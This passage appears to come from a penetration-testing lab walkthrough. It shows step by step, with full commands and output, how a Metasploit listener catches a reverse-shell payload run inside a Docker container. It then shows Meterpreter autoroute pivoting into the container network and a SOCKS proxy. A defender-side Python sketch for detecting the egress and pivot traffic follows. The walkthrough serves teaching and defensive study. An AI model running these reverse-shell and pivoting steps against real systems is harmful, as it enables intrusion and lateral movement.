Start a listener on the Kali machine itself, at `192.168.56.103:4444`:

```txt
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.56.103
lhost => 192.168.56.103
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > run
```

Run `chmod +x ./shell.elf && ./shell.elf`, then check whether Kali responds:

```txt
/app # chmod +x ./shell.elf
/app # ./shell.elf
```

Use `shell` to call the target container's system shell for some simple probing, for example `ip a` to view the container's internal network state. Once its internal network address `172.17.0.3/16` is determined, leave with `exit`.

```txt
[*] Started reverse TCP handler on 192.168.56.103:4444
[*] Sending stage (3045348 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.103:4444 -> 192.168.56.101:36424) at 2022-10-19 17:38:38 +0800

meterpreter > shell
Process 18 created.
Channel 1 created.
ls
Dockerfile
main.py
requirements.txt
shell.elf
templates
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
6: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP
    link/ether 02:42:ac:11:00:03 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.3/16 brd 172.17.255.255 scope global eth0
       valid_lft forever preferred_lft forever
exit
```

- Convert the address obtained, `172.17.0.3/16`, to its network `172.17.0.0/16` and add a route with the `run autoroute -s 172.17.0.0/16` command, then check that it was added with `run autoroute -p`.

```txt
meterpreter > run autoroute -s 172.17.0.0/16
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 172.17.0.0/255.255.0.0...
[+] Added route to 172.17.0.0/255.255.0.0 via 192.168.56.101
[*] Use the -p option to list all active routes
meterpreter > run autoroute -p
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   172.17.0.0         255.255.0.0        Session 1
```

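- Once the route has been created, suspend the current session. `background` puts the current msf session in the background; to pick the session up again, use `sessions -i <i>`, where `<i>` is the session number.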

```txt
meterpreter > background
[*] Backgrounding session 1...
```

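- Continuing from the previous step, enter the proxy module with `use auxiliary/server/socks_proxy`
- Set the service version: `set VERSION 4a`
- Set the IP: `set SRVHOST <Kali IP>`
- Check that the configuration is correct: `show options`
- Finish up: `exploit`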

```txt
msf6 exploit(multi/handler) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set VERSION 4a
VERSION => 4a
msf6 auxiliary(server/socks_proxy) > set SRVHOST 192.168.56.103
SRVHOST => 192.168.56.103
msf6 auxiliary(server/socks_proxy) > show options

Module options (auxiliary/server/socks_proxy):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  192.168.56.103   yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  1080             yes       The port to listen on
   VERSION  4a               yes       The SOCKS version to use (Accepted: 4a, 5)

Auxiliary action:

   Name   Description
   ----   -----------
   Proxy  Run a SOCKS proxy server

msf6 auxiliary(server/socks_proxy) > exploit
[*] Auxiliary module running as background job 0.
[*] Starting the SOCKS proxy server
```

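
A defender-side view of the two network signals this walkthrough leaves behind, as an added example that is not part of the original page: the container dialing out of the bridge to `192.168.56.103:4444`, and the routed session making one container fan out across `172.17.0.0/16`. The flow records, the allowlist, the threshold and the peer addresses `172.17.0.2` and `172.17.0.4` are constructed assumptions.

```python
import ipaddress
from collections import defaultdict

# Assumed policy values for this sketch; tune them to the real environment.
BRIDGE = ipaddress.ip_network("172.17.0.0/16")   # Docker bridge subnet seen in `ip a` above
EGRESS_ALLOW = {("172.17.0.1", 53)}              # assumed: only this destination is expected
FANOUT_THRESHOLD = 3                             # assumed: distinct peer (ip, port) pairs

# Constructed flow records "src dst dport" (not captured from the page's lab).
SAMPLE_FLOWS = """\
172.17.0.3 172.17.0.1 53
172.17.0.3 192.168.56.103 4444
172.17.0.3 172.17.0.2 22
172.17.0.3 172.17.0.2 80
172.17.0.3 172.17.0.4 6379
172.17.0.3 172.17.0.4 8080
172.17.0.2 172.17.0.1 53
"""

def parse_flows(text):
    """Yield (src, dst, dport) per line, skipping malformed records."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 3 or not parts[2].isdigit():
            continue
        try:
            yield ipaddress.ip_address(parts[0]), ipaddress.ip_address(parts[1]), int(parts[2])
        except ValueError:
            continue

def detect(text):
    """Return (egress_alerts, pivot_alerts) for flows that start inside the bridge."""
    egress, peers = [], defaultdict(set)
    for src, dst, dport in parse_flows(text):
        if src not in BRIDGE or (str(dst), dport) in EGRESS_ALLOW:
            continue
        if dst in BRIDGE:
            peers[str(src)].add((str(dst), dport))      # east-west traffic between containers
        else:
            egress.append((str(src), str(dst), dport))  # container connecting out of the bridge
    pivots = {s: sorted(p) for s, p in peers.items() if len(p) >= FANOUT_THRESHOLD}
    return egress, pivots

if __name__ == "__main__":
    egress_alerts, pivot_alerts = detect(SAMPLE_FLOWS)
    for alert in egress_alerts:
        print("unexpected container egress:", alert)
    for source, targets in pivot_alerts.items():
        print("possible pivot source:", source, targets)
```

Traffic sent through the autoroute entry leaves from the compromised container, which is why the fan-out is attributed to `172.17.0.3` rather than to the Kali host.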